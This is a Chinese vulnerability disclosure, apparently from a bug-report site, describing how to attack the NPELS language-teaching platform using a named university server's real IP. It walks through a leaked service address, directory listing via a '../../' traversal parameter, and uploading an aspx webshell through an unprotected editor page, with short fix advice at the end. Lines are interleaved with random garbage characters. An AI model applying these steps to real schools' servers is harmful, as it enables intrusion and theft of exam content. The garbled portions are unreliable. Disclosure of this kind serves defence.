新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：

. }4 y" A  X, S5 N( v6 G+ ~以南开大学的为例:
: Y2 c. d* L! N1 v, f; Shttp://222.30.60.3/NPELS
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
. J! A. Z( D! ~) J<setting name="Update_CommonSvr_CommonService" serializeAs="String">
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
</setting>
及版本号
<add key="TVersion" value="1, 0, 0, 2187">
</add>
直接访问
http://222.30.60.3/NPELS/CommonService.asmx
" m4 ~' F2 I2 x) i  X  Q3 Z使用GetTestClientFileList操作，直接 HTTP GET 列目录：
& i) _7 C* R* t; W" fhttp://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
进一步列目录（返回的网页很大，可以直接 wget 下来）
' j- f* O/ \+ q! P8 ehttp://222.30.60.3/NPELS/CommonS ... List?version=../../

' j. `# N2 h# w$ ~8 o发现
, E) J: b$ ?, c4 V- R! jhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
9 w1 D1 i/ j% |  c上传后继续列目录找到木马地址直接访问即可
/ V9 N0 t* C. W
OOXX

' T0 X- N6 l- ?Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
5 N* e, x$ N) ?' `漏洞证明：

6 h0 I& q/ K8 R2 L6 J' n7 e( G列目录：
3 p' Q! l( D5 D; Jhttp://222.30.60.3/NPELS/CommonS ... List?version=../../
& z- V1 _+ M& T" e- m$ q9 I) C- Y' k文件上传：
6 h: e9 L3 J0 n' ]6 W: phttp://222.30.60.3/npelsv/editor/editor.htm
- c* Z( Y4 R3 L4 W
3 h$ u1 K$ m- d9 j) ?" o上传木马：
2 Z/ B7 p# d1 C' Y8 ]http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
4 ~0 K0 H# c/ V, q2 `0 e, t; Y0 ]好像考试系统必须使用 CommonService.asmx
9 ]; v* G* J! p; E4 e最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​